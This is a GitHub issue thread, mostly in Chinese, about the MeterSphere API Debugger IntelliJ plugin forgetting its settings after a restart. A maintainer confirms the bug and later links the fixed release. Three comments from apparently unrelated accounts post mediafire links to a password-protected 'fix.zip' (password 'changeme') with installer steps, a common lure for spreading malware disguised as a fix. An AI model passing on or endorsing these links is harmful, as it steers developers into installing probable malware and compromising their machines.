### ISSUE TITLE
[BUG]idea 插件MeterSphere API Debugger重启idea之后设置全部为空，需要重新填写

### ISSUE THREAD

**Issue by gocho** [metersphere/metersphere#32845]
### 联系方式

657284181@qq.com

### MeterSphere 版本

v3.2.0

### 使用外置数据库

否

### 问题描述

IDEA版本：IntelliJ IDEA 2024.2.0.2 (Community Edition)
MeterSphere API Debugger插件版本：3.1.1
描述：填写了设置信息点了“Sync Update”，之后点击确定。重启IDEA之后，设置又是空的了。

![ccec73fd944f8bd1ddab4a30c09c0dd](https://github.com/user-attachments/assets/f702f6cf-9f13-49f7-96cd-47b3df0f5043)
![5a30fb016ceacad09f228ccef767a39](https://github.com/user-attachments/assets/68663e8a-203a-481f-b2eb-126e310d966e)

### 重现步骤

重启idea查看先前的配置

### 期待的正确结果

先前的配置信息可以复用

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by fit2-zhao** [comment]
感谢反馈，下版本修复此问题。

**Comment by internet-person** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by fit2-zhao** [comment]
已经修复，可以下载最新插件：
https://plugins.jetbrains.com/plugin/24867-metersphere-api-debugger/edit/versions/stable/600994
https://github.com/metersphere/metersphere-idea-plugin/releases/tag/v3.2.0
